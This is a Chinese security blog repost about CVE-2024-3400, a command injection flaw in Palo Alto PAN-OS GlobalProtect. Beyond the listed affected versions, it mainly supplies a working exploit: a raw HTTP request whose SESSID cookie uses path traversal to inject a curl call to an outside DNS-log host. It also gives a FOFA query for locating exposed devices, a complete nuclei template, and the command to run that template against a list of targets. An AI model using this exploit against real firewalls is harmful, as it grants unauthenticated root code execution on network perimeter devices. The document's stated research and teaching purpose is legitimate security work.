CVE-2024-3400

admin 2024年4月19日03:33:24评论118 views字数 2507阅读8分21秒阅读模式

使

01

漏洞名称

Palo Alto Networks PAN-OS GlobalProtect 命令注入漏洞

02

漏洞影响

    影响版本
    PAN-OS 10.2 < 10.2.9-h1
    PAN-OS 11.0 < 11.0.4-h1
    PAN-OS 11.1 < 11.1.2-h3
    安全版本
    PAN-OS 10.2.9-h1
    PAN-OS 11.0.4-h1
    PAN-OS 11.1.2-h3

  CVE-2024-3400

03

漏洞描述

Palo Alto Networks PAN-OS GlobalProtect 是Palo Alto Networks 的一款防火墙产品。2024年4月12日,官方披露CVE-2024-3400 Palo Alto Networks GlobalProtect 命令注入漏洞。在特定PAN-OS版本和不同功能配置下,未经身份验证的攻击者可能利用此漏洞在防火墙上以root权限执行任意代码。

04

FOFA搜索语句
icon_hash="-631559155"

CVE-2024-3400

05

漏洞复现

poc如下,注入点在Cookie中,将其中的DNSlog地址替换为你的dnslog地址,借助DNSLOG来复现,可以使用http://dnslog.pw/

GET /global-protect/login.esp HTTP/1.1Host: 192.168.30.112:1005User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84Connection: closeCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;Accept-Encoding: gzip

CVE-2024-3400

漏洞复现成功

06

nuclei poc

poc文件内容如下

id: CVE-2024-3400info:  name: GlobalProtect - OS Command Injection  author: pdresearch,parthmalhotra  severity: critical  description: |    A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.  reference:    - https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-CVE-2024-3400/    - https://github.com/fkie-cad/nvd-json-data-feeds    - https://github.com/k4nfr3/nmap-scripts    - https://github.com/0x0d3ad/CVE-2024-3400    - https://github.com/FoxyProxys/CVE-2024-3400    - https://github.com/MrR0b0t19/CVE-2024-3400    - https://nvd.nist.gov/vuln/detail/CVE-2024-3400  classification:    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H    cvss-score: 10    cve-id: CVE-2024-3400    cwe-id: CWE-77    epss-score: 0.00371    epss-percentile: 0.72356    cpe: cpe:2.3:o:paloaltonetworks:pan-os:10.2.0:*:*:*:*:*:*:*  metadata:    verified: true    max-request: 1    fofa-query: icon_hash="-631559155"    product: pan-os    vendor: paloaltonetworks  tags: cve,cve2024,globalprotect,pan-os,rce,oast,kevhttp:  - raw:      - |        GET /global-protect/login.esp HTTP/1.1        Host: {{Hostname}}        Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}{{interactsh-url}}`;    matchers-condition: and    matchers:      - type: word        part: interactsh_protocol        words:          - "http"      - type: word        part: body        words:          - "GlobalProtect Portal"

运行POC

nuclei.exe -t mypoc/cve/CVE-2024-3400.yaml -l data1.txt

CVE-2024-3400

07

修复建议

升级到最新版本。

原文始发于微信公众号(AI与网安):CVE-2024-3400

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月19日03:33:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-3400https://cn-sec.com/archives/2668645.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息